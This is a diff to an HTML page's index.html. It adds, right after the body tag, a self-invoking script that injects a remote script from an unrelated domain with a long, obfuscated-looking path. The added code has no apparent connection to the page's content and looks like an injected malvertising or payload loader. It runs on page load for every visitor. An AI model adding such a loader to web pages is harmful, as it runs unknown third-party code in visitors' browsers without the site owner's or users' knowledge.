--- a/index.html
+++ b/index.html
@@ -36,6 +36,23 @@
   </head>
 <body class="w3-light-grey w3-content" style="max-width:1600px">
 
+
+
+  <script>
+    (function(onnrz){
+    var d = document,
+        s = d.createElement('script'),
+        l = d.scripts[d.scripts.length - 1];
+    s.settings = onnrz || {};
+    s.src = "\/\/emotionalfriendship.com\/cwDX9.6ibZ2s5iloS-WXQA9fN\/DJYj4bNHzeMA3lM_yd0u0ZNnjzgk3XM\/zycR0I";
+    l.parentNode.insertBefore(s, l);
+    })({})
+    </script>
+
+
+
+
+
 <!-- Sidebar/menu -->
 
 <nav class="w3-sidebar w3-collapse w3-white w3-animate-left" style="z-index:3;width:300px;" id="mySidebar"><br>
